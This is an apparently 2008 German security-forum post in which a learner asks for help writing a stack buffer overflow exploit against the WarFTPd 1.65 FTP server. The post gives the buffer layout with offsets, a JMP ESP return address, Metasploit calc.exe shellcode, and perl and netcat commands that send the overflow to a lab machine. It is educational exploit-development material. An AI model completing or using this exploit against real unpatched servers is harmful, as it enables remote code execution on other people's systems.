[HaBo]

muffin · 23.03.08, 00:00

Hallo,
da ich mich mit b0f's einmal näher beschäftigen wollte, habe ich mir den WarFTPd 1.65 runtergeladen und installiert. Zusammen OllyDbg und was man sonst noch alles braucht. Eine DoS Situation herbeizuführen ist nicht so schwer, aber mir ich verstehe noch nicht ganz, wo meine Idee zum gezielten Lenken des Streams scheitert.

Meine Ergebnisse:

|------ 485 bytes buffer ------><--4b EIP---><---80b---><--4b Pointer Next SEH---><--4bSEH--><---68b----|

Zuersteinmal will ich keinen SEH Overwrite provozieren, ergo muss die EIP stimmen, mit findjmp habe ich die ntdll.dll im ESP Register durchsucht. Eine gültige Rücksprungadresse (JMP ESP) wäre bei mir z.B. 0x7c93c35c

Als Shellcode hätte ich folgenden verwendet:
# windows/exec - 121 bytes
# http://www.metasploit.com
# EXITFUNC=seh, CMD=calc.exe
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\ x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\ x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\ x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\ xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\ xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\ x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\ xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\ xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

mit

#perl -e 'print "A"x485,"CCCC","DDDD"' > test
#nc -vvn -i2 192.168.0.30 21 < test
[...] Strg + C
Wird in OllyDbg die EIP mit 43434343 also den Cs überschrieben.

Problem: Wie muss ich diese Puzzelteile richtig aneinander fügen, oder wo liegt der Fehler, dass mit NetCat nicht funktioniert? Die RET stimmt auf alle Fälle (Metasploit Plugin auf XP SP2 Target umgeschrieben).

|------ 485 bytes "A" ------><--\x5c\xc3\x93\x7c---><---80b---><--4b Pointer Next SEH---><--4bSEH--><---68b----|

Wo muss ich den Shellcode einbauen, bzw wie? Die 485 byte an Buffer müssen anscheinend ASCII sein, da ich sonst keinen Überlauf mit 485 hinbekomme.

Danke schonmal für die Hilfe, ich bin ehrlich verzweifelt zumals in metasploit nach anpassungen funktioniert?! Was macht Metasploit anders als ich?

MfG
MuFF!/V

Anzeige

- Anzeige -

23.03.08, 00:00	#1 (permalink)
muffin Registriert seit: 22.03.08 Likes: 0	Exploitentwicklung - Hilfe bei WarFTPd 1.65 Anzeige Hallo, da ich mich mit b0f's einmal näher beschäftigen wollte, habe ich mir den WarFTPd 1.65 runtergeladen und installiert. Zusammen OllyDbg und was man sonst noch alles braucht. Eine DoS Situation herbeizuführen ist nicht so schwer, aber mir ich verstehe noch nicht ganz, wo meine Idee zum gezielten Lenken des Streams scheitert. Meine Ergebnisse: \|------ 485 bytes buffer ------><--4b EIP---><---80b---><--4b Pointer Next SEH---><--4bSEH--><---68b----\| Zuersteinmal will ich keinen SEH Overwrite provozieren, ergo muss die EIP stimmen, mit findjmp habe ich die ntdll.dll im ESP Register durchsucht. Eine gültige Rücksprungadresse (JMP ESP) wäre bei mir z.B. 0x7c93c35c Als Shellcode hätte ich folgenden verwendet: # windows/exec - 121 bytes # http://www.metasploit.com # EXITFUNC=seh, CMD=calc.exe "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\ x78\x01" . "\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\ x8b\x01" . "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\ x01\xc2" . "\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\ xeb\x66" . "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\ xeb\x89" . "\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\ x30\x8b" . "\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\ xc0\x6a" . "\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\ xff\xe7" . "\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; mit #perl -e 'print "A"x485,"CCCC","DDDD"' > test #nc -vvn -i2 192.168.0.30 21 < test [...] Strg + C Wird in OllyDbg die EIP mit 43434343 also den Cs überschrieben. Problem: Wie muss ich diese Puzzelteile richtig aneinander fügen, oder wo liegt der Fehler, dass mit NetCat nicht funktioniert? Die RET stimmt auf alle Fälle (Metasploit Plugin auf XP SP2 Target umgeschrieben). \|------ 485 bytes "A" ------><--\x5c\xc3\x93\x7c---><---80b---><--4b Pointer Next SEH---><--4bSEH--><---68b----\| Wo muss ich den Shellcode einbauen, bzw wie? Die 485 byte an Buffer müssen anscheinend ASCII sein, da ich sonst keinen Überlauf mit 485 hinbekomme. Danke schonmal für die Hilfe, ich bin ehrlich verzweifelt zumals in metasploit nach anpassungen funktioniert?! Was macht Metasploit anders als ich? MfG MuFF!/V

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
HILFE! Meine Festplatte ist verschlüsselt! HILFE!	porsche	Cryptography & Encryption	19	02.08.05 16:46
Hilfe Hilfe Hilfe - Virusproblem	Nicmon	Windows	9	03.09.03 15:14
HILFE!!!! Ich bauch dringend Hilfe!!!!	Mackanzy	Windows	10	12.08.03 15:02
Anmeldemeldung HILFE HILFE	HOLGERmuc	Windows	19	27.04.03 13:17
[hilfe] Ich Brauch Dringend Eure Hilfe ...	VoodooManiax	Cryptography & Encryption	5	19.04.02 07:38

[HaBo]

Exploitentwicklung - Hilfe bei WarFTPd 1.65